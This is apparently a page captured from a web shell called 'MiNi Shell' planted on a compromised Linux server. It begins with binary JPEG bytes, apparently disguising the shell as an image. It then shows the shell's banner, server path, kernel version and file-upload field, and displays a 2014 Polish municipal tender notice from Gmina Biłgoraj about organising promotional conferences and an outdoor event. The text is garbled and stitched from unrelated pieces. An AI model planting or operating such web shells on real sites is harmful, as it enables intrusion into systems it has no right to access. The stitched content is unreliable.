JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140813/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140813/270820-N-2014.html

<p class="kh_header"><b>Biłgoraj: Organizacja wydarzeń informacyjno- promocyjnych w ramach realizacji projektu, pn.: System promocji i informacji gospodarczej w Gminie Biłgoraj</b><br>
<b>Numer ogłoszenia: 270820 - 2014; data zamieszczenia: 13.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Biłgoraj , ul. Kościuszki 88, 23-400 Biłgoraj, woj. lubelskie, tel. 84 6882830, faks 84 6863584.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugbilgoraj.bip.lubelskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja wydarzeń informacyjno- promocyjnych w ramach realizacji projektu, pn.: System promocji i informacji gospodarczej w Gminie Biłgoraj.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Organizacja wydarzeń informacyjno-promocyjnych w ramach realizacji projektu pn.:  SYSTEM PROMOCJI I INFORMACJI GOSPODARCZEJ W GMINIE BIŁGORAJ, zamówienie zostało podzielone na dwie części, 

Część Nr I:

1)	Organizacja konferencji otwierającej, obejmuje:
-  Zapewnienie sali konferencyjnej wraz z wyposażeniem 
-  Zabezpieczenie usługi cateringowej z obsługą
-  Wydrukowanie programu konferencji oraz wykonanie materiałów promocyjnych oraz identyfikatorów dla prelegentów 
i uczestników
-  Zapewnienie oznakowania wizualnego miejsca konferencji- zgodnie z Księgą Identyfikacji Wizualnej NSS,
-  Zapewnienie prelegentów na konferencję


2)	Forum lokalnej przedsiębiorczości (2 szt.)
-  Zapewnienie sali konferencyjnej wraz z wyposażeniem
-  Zabezpieczenie usługi cateringowej z obsługą
-  Wydrukowanie programu forum oraz wykonanie materiałów promocyjnych oraz identyfikatorów dla prelegentów 
 i uczestników
-  Zapewnienie oznakowania wizualnego miejsca forum- zgodnie z Księgą Identyfikacji Wizualnej NSS,
-  Zapewnienie prelegentów na forum oraz osoby moderującej panel dyskusyjny

3)	Organizacja konferencji podsumowującej: 
-  Zapewnienie sali konferencyjnej wraz z wyposażeniem 
-  Zabezpieczenie usługi cateringowej z obsługą
-  Wydrukowanie programu konferencji oraz wykonanie materiałów promocyjnych oraz identyfikatorów dla prelegentów 
 i uczestników
-  Zapewnienie oznakowania wizualnego miejsca konferencji- zgodnie z Księgą Identyfikacji Wizualnej NSS,
-  Zapewnienie prelegentów na konferencję

Część Nr II:

1)	Organizacja imprezy plenerowej
-  Zaproponowanie artystów oraz zawarcie stosownych umów z artystami zaakceptowanymi przez Zamawiającego
 - Zapewnienie kompleksowej oprawy, obsługi technicznej i sprzętowej wydarzenia plenerowego
-  Zapewnienie konferansjera , który poprowadzi imprezę
-  Organizację i zabezpieczenie miejsca imprezy , wskazanego przez Zamawiającego
-  Przeprowadzenie kampanii promocyjnej imprezy 
-  Dodatkowe obowiązki Wykonawcy (m.in. pokaz kulinarny, animacje i konkursy dla dzieci, loty balonem pionowe na uwięzi, mini zoo, przejażdżki bryczką po okolicy, 10 szt. ścianek wystawienniczych plenerowych, pokaz ginących zawodów, wycieczka autokarowa po terenie Gminy Biłgoraj, telebim, 4 stoiska wystawiennicze, pokaz laserowy, catering) 

Szczegółowy opis przedmiotu zamówienia (zakres usługi)  określa  załącznik do SIWZ

Jeżeli w  dokumentach załączonych do niniejszej SIWZ opisano  przedmiot zamówienia ze wskazaniem określeń, oznaczeń o których mowa w art. 29 ust 3 i art. 30 ust 1- 3 PZP, należy przyjąć, że  wskazaniu takiemu towarzyszy określenie lub równoważny,  równoważne opisywanym. Towary, materiały, urządzenia, rozwiązania równoważne w stosunku do towarów, materiałów, urządzeń, rozwiązań opisanych w dokumentacji przetargowej za pomocą wskazań określonych w art. 29 ust 3 i art. 30 ust 1-3 ustawy PZP  to towary, materiały, urządzenia, rozwiązania o parametrach nie gorszych niż określone w dokumentacji projektowej. Przyjmuje się, że wszelkie towary/materiały/urządzenia rozwiązania opisane w sposób jw., określają minimalne parametry techniczne, jakościowe i użytkowe, jakim muszą odpowiadać towary, materiały, urządzenia, rozwiązania oferowane, aby spełnić wymagania stawiane przez Zamawiającego;.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.95.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1	Każdy wykonawca zobowiązany jest do wniesienia wadium w wysokości:
Część I- 1.000  zł (słownie: tysiąc złotych)
Część II-  800 zł (słownie: osiemset złotych)
2	Wadium musi być wniesione przed upływem terminu do składania ofert.
3	Wadium może być wniesione w jednej lub kilku następujących formach:
1) pieniądzu, przelewem na konto bankowe Zamawiającego, prowadzone w Banku PEKAO SA, Nr konta bankowego 21 1240 2816 1111 0010 3394 2987
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3) gwarancjach bankowych;
4) gwarancjach ubezpieczeniowych;
5) poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109 poz. 1158, ze zm.).
4	Jeżeli wadium zostanie wniesione w pieniądzu, przelewem, na poleceniu przelewu należy wpisać: Wadium -  System promocji i informacji gospodarczej w Gminie Biłgoraj, (Część I, Część II)
5	W przypadku wnoszenia wadium w innych formach niż w pieniądzu, wymagane jest dołączenie do oferty dokumentu wystawionego na rzecz Zamawiającego. Dokumenty, o których mowa w punkcie 3 ppkt 2)-5) SIWZ muszą zawierać określony datą termin odpowiedzialności, nie krótszy niż okres związania ofertą określony w specyfikacji istotnych warunków zamówienia oraz wszystkie przypadki utraty wadium przez Wykonawcę określone w art.46 ust. 5 PZP. Kserokopię dokumentów potwierdzających wniesienie wadium należy dołączyć do oferty, natomiast oryginał gwarancji, poręczenia należy umieścić w ofercie w sposób umożliwiający jego zwrot zgodnie z zapisami ustawy.
6	W przypadku wnoszenia wadium przelewem na rachunek bankowy, o jego wniesieniu w terminie decydować będzie data i godzina wpływu środków na rachunek bankowy Zamawiającego.
7	Zamawiający zwróci wadium wszystkim  wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z  wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza  z zastrzeżeniem pkt 12
8	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
9	Zamawiający zwróci niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
10	Zamawiający będzie żądał ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie pkt 1, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wniesienie wadium w terminie określonym przez zamawiającego.
11	Jeżeli wadium wniesiono w pieniądzu, zamawiający  zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
12	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie , o którym mowa w art. 26 ust 3 PZP, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust 1 Prawa zamówień publ;icznych lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
13	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca którego oferta została wybrana:
1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
2)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
3)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>tj. wykaże/ą, że w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzonej działalności jest krótszy- w tym okresie wykonali:
a)	dla części I - co najmniej 2 usługi, polegające na zorganizowaniu konferencji i/lub forum dla minimum 80 osób o wartości co najmniej 5.000,00 zł netto każdego z wydarzeń;
b)	dla części II - co najmniej 1 usługi, ( tj. obejmującej łącznie obsługę techniczną, nagłośnienie, oświetlenie, zabezpieczenie) polegającej na organizacji plenerowej imprezy masowej o charakterze artystyczno- rozrywkowym dla widowni liczącej minimum 1000 osób o wartości nie mniejszej niż 30.000, 00 zł netto</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>zgodnie z SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ugbilgoraj.bip.lubelskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Biłgoraj
23- 400 Biłgoraj
ul. Kościuszki 88.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.08.2014 godzina 10:00, miejsce: Urząd Gminy Biłgoraj
23- 400 Biłgoraj
ul. Kościuszki 88
Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Fundusz Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Lubelskiego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Organizacja wydarzeń informacyjno- promocyjnych w ramach realizacji projektu, pn.: System promocji i informacji gospodarczej w Gminie Biłgoraj.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Organizacja konferencji otwierającej, obejmuje:
-  Zapewnienie sali konferencyjnej wraz z wyposażeniem 
-  Zabezpieczenie usługi cateringowej z obsługą
-  Wydrukowanie programu konferencji oraz wykonanie materiałów promocyjnych oraz identyfikatorów dla prelegentów 
i uczestników
-  Zapewnienie oznakowania wizualnego miejsca konferencji- zgodnie z Księgą Identyfikacji Wizualnej NSS,
-  Zapewnienie prelegentów na konferencję


2)	Forum lokalnej przedsiębiorczości (2 szt.)
-  Zapewnienie sali konferencyjnej wraz z wyposażeniem
-  Zabezpieczenie usługi cateringowej z obsługą
-  Wydrukowanie programu forum oraz wykonanie materiałów promocyjnych oraz identyfikatorów dla prelegentów 
 i uczestników
-  Zapewnienie oznakowania wizualnego miejsca forum- zgodnie z Księgą Identyfikacji Wizualnej NSS,
-  Zapewnienie prelegentów na forum oraz osoby moderującej panel dyskusyjny

3)	Organizacja konferencji podsumowującej: 
-  Zapewnienie sali konferencyjnej wraz z wyposażeniem 
-  Zabezpieczenie usługi cateringowej z obsługą
-  Wydrukowanie programu konferencji oraz wykonanie materiałów promocyjnych oraz identyfikatorów dla prelegentów 
 i uczestników
-  Zapewnienie oznakowania wizualnego miejsca konferencji- zgodnie z Księgą Identyfikacji Wizualnej NSS,
-  Zapewnienie prelegentów na konferencję

Szczegółowy opis przedmiotu zamówienia (zakres usługi)  określa  załącznik do SIWZ:

Jeżeli w  dokumentach załączonych do niniejszej SIWZ opisano  przedmiot zamówienia ze wskazaniem określeń, oznaczeń o których mowa w art. 29 ust 3 i art. 30 ust 1- 3 PZP, należy przyjąć, że  wskazaniu takiemu towarzyszy określenie lub równoważny,  równoważne opisywanym. Towary, materiały, urządzenia, rozwiązania równoważne w stosunku do towarów, materiałów, urządzeń, rozwiązań opisanych w dokumentacji przetargowej za pomocą wskazań określonych w art. 29 ust 3 i art. 30 ust 1-3 ustawy PZP  to towary, materiały, urządzenia, rozwiązania o parametrach nie gorszych niż określone w dokumentacji projektowej. Przyjmuje się, że wszelkie towary/materiały/urządzenia rozwiązania opisane w sposób jw., określają minimalne parametry techniczne, jakościowe i użytkowe, jakim muszą odpowiadać towary, materiały, urządzenia,rozwiązania oferowane, aby spełnić wymagania stawiane przez Zamawiającego;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.95.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Organizacja wydarzeń informacyjno- promocyjnych w ramach realizacji projektu, pn.: System promocji i informacji gospodarczej w Gminie Biłgoraj.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Organizacja imprezy plenerowej
-  Zaproponowanie artystów oraz zawarcie stosownych umów z artystami zaakceptowanymi przez Zamawiającego
 - Zapewnienie kompleksowej oprawy, obsługi technicznej i sprzętowej wydarzenia plenerowego
-  Zapewnienie konferansjera , który poprowadzi imprezę
-  Organizację i zabezpieczenie miejsca imprezy , wskazanego przez Zamawiającego
-  Przeprowadzenie kampanii promocyjnej imprezy 
-  Dodatkowe obowiązki Wykonawcy (m.in. pokaz kulinarny, animacje i konkursy dla dzieci, loty balonem pionowe na uwięzi, mini zoo, przejażdżki bryczką po okolicy, 10 szt. ścianek wystawienniczych plenerowych, pokaz ginących zawodów, wycieczka autokarowa po terenie Gminy Biłgoraj, telebim, 4 stoiska wystawiennicze, pokaz laserowy, catering) 

       Szczegółowy opis przedmiotu zamówienia (zakres usługi)  określa  załącznik do SIWZ:

Jeżeli w  dokumentach załączonych do niniejszej SIWZ opisano  przedmiot zamówienia ze wskazaniem określeń, oznaczeń o których mowa w art. 29 ust 3 i art. 30 ust 1- 3 PZP, należy przyjąć, że  wskazaniu takiemu towarzyszy określenie lub równoważny,  równoważne opisywanym. Towary, materiały, urządzenia, rozwiązania równoważne w stosunku do towarów, materiałów, urządzeń, rozwiązań opisanych w dokumentacji przetargowej za pomocą wskazań określonych w art. 29 ust 3 i art. 30 ust 1-3 ustawy PZP  to towary, materiały, urządzenia, rozwiązania o parametrach nie gorszych niż określone w dokumentacji projektowej. Przyjmuje się, że wszelkie towary materiały, urządzenia rozwiązania opisane w sposób jw., określają minimalne parametry techniczne, jakościowe i użytkowe, jakim muszą odpowiadać towary, materiały, urządzenia, rozwiązania oferowane, aby spełnić wymagania stawiane przez Zamawiającego;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.95.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com